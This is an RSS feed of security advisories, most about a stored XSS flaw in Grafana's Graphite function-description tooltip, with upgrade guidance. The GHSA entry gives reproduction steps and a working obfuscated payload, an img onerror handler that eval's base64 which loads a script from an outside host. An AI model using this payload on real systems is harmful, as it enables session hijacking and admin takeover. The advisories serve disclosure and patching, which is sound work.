<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 11:03:57 +0000</lastBuildDate>
    <item>
      <title>bdu:2024-02575</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2024-02575</link>
      <description>bdu:2024-02575</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2024-02575</guid>
    </item>
    <item>
      <title>BIT-grafana-2023-1410 — Stored XSS in Graphite FunctionDescription tooltip</title>
      <link>https://cve.radiocsirt.org/vuln/bit-grafana-2023-1410</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Bitnami: grafana&lt;/p&gt;
&lt;p&gt;Grafana is an open-source platform for monitoring and observability.&lt;/p&gt;
&lt;p&gt;Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.&lt;/p&gt;
&lt;p&gt;The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.&lt;/p&gt;
&lt;p&gt;An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.&lt;/p&gt;
&lt;p&gt;Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Bitnami: grafana&lt;/p&gt;
&lt;p&gt;Grafana is an open-source platform for monitoring and observability.&lt;/p&gt;
&lt;p&gt;Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.&lt;/p&gt;
&lt;p&gt;The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.&lt;/p&gt;
&lt;p&gt;An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.&lt;/p&gt;
&lt;p&gt;Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bit-grafana-2023-1410</guid>
    </item>
    <item>
      <title>certfr-2023-avi-0257 — Une vulnérabilité a été découverte dans Grafana. Elle permet à un
attaquant de provoquer une injection de code indirect…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2023-avi-0257</link>
      <description>certfr-2023-avi-0257</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2023-avi-0257</guid>
    </item>
    <item>
      <title>EUVD-2026-220480</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-220480</link>
      <description>EUVD-2026-220480</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-220480</guid>
    </item>
    <item>
      <title>fkie_cve-2023-1410</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2023-1410</link>
      <description>&lt;p&gt;Grafana is an open-source platform for monitoring and observability.&lt;/p&gt;
&lt;p&gt;Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.&lt;/p&gt;
&lt;p&gt;The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.&lt;/p&gt;
&lt;p&gt;An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.&lt;/p&gt;
&lt;p&gt;Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Grafana is an open-source platform for monitoring and observability.&lt;/p&gt;
&lt;p&gt;Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.&lt;/p&gt;
&lt;p&gt;The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.&lt;/p&gt;
&lt;p&gt;An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.&lt;/p&gt;
&lt;p&gt;Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2023-1410</guid>
    </item>
    <item>
      <title>GHSA-qrrg-gw7w-vp76 — Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-qrrg-gw7w-vp76</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/grafana/grafana&lt;/p&gt;
&lt;p&gt;### Summary
When a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use `Functions`. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;1. Spin up your own Graphite instance. I&amp;#39;ve done this using the `make devenv sources=graphite`.
2. Now start a terminal for your Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py` 
3. Basically you can pick any function but I picked the `aggregateSeriesLists` function. Modify its description to be `&amp;#34;&amp;gt;&amp;lt;img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))&amp;gt;`&lt;/p&gt;
&lt;p&gt;The result would look like this:&lt;/p&gt;
&lt;p&gt;```python
def aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None):
  &amp;#34;&amp;#34;&amp;#34;…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/grafana/grafana&lt;/p&gt;
&lt;p&gt;### Summary
When a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use `Functions`. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;1. Spin up your own Graphite instance. I&amp;#39;ve done this using the `make devenv sources=graphite`.
2. Now start a terminal for your Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py` 
3. Basically you can pick any function but I picked the `aggregateSeriesLists` function. Modify its description to be `&amp;#34;&amp;gt;&amp;lt;img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))&amp;gt;`&lt;/p&gt;
&lt;p&gt;The result would look like this:&lt;/p&gt;
&lt;p&gt;```python
def aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None):
  &amp;#34;&amp;#34;&amp;#34;…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-qrrg-gw7w-vp76</guid>
    </item>
    <item>
      <title>gsd-2023-1410</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2023-1410</link>
      <description>gsd-2023-1410</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2023-1410</guid>
    </item>
    <item>
      <title>openSUSE-SU-2024:12855-1 — grafana-9.4.7-1.1 on GA media</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2024:12855-1</link>
      <description>&lt;p&gt;grafana-9.4.7-1.1 on GA media&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;grafana-9.4.7-1.1 on GA media&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2024:12855-1</guid>
    </item>
    <item>
      <title>RHSA-2023:7741 — Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2023:7741</link>
      <description>&lt;p&gt;grafana: JWT token leak to data source grafana: Stored XSS in Graphite FunctionDescription tooltip grafana: missing access control allows test alerts by underprivileged user grafana: data source proxy race condition golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack)&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;grafana: JWT token leak to data source grafana: Stored XSS in Graphite FunctionDescription tooltip grafana: missing access control allows test alerts by underprivileged user grafana: data source proxy race condition golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack)&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2023:7741</guid>
    </item>
    <item>
      <title>SUSE-SU-2023:1902-1 — Security update for SUSE Manager Client Tools</title>
      <link>https://cve.radiocsirt.org/vuln/suse-su-2023:1902-1</link>
      <description>&lt;p&gt;Security update for SUSE Manager Client Tools&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Security update for SUSE Manager Client Tools&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/suse-su-2023:1902-1</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2023-1410</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2023-1410</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:16.04:LTS: grafana&lt;/p&gt;
&lt;p&gt;Grafana is an open-source platform for monitoring and observability. Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized. An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.   Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:16.04:LTS: grafana&lt;/p&gt;
&lt;p&gt;Grafana is an open-source platform for monitoring and observability. Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized. An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.   Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2023-1410</guid>
    </item>
    <item>
      <title>WID-SEC-W-2023-0726 — Grafana: Schwachstelle ermöglicht Cross-Site Scripting</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2023-0726</link>
      <description>&lt;p&gt;Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Grafana ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Grafana ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2023-0726</guid>
    </item>
  </channel>
</rss>
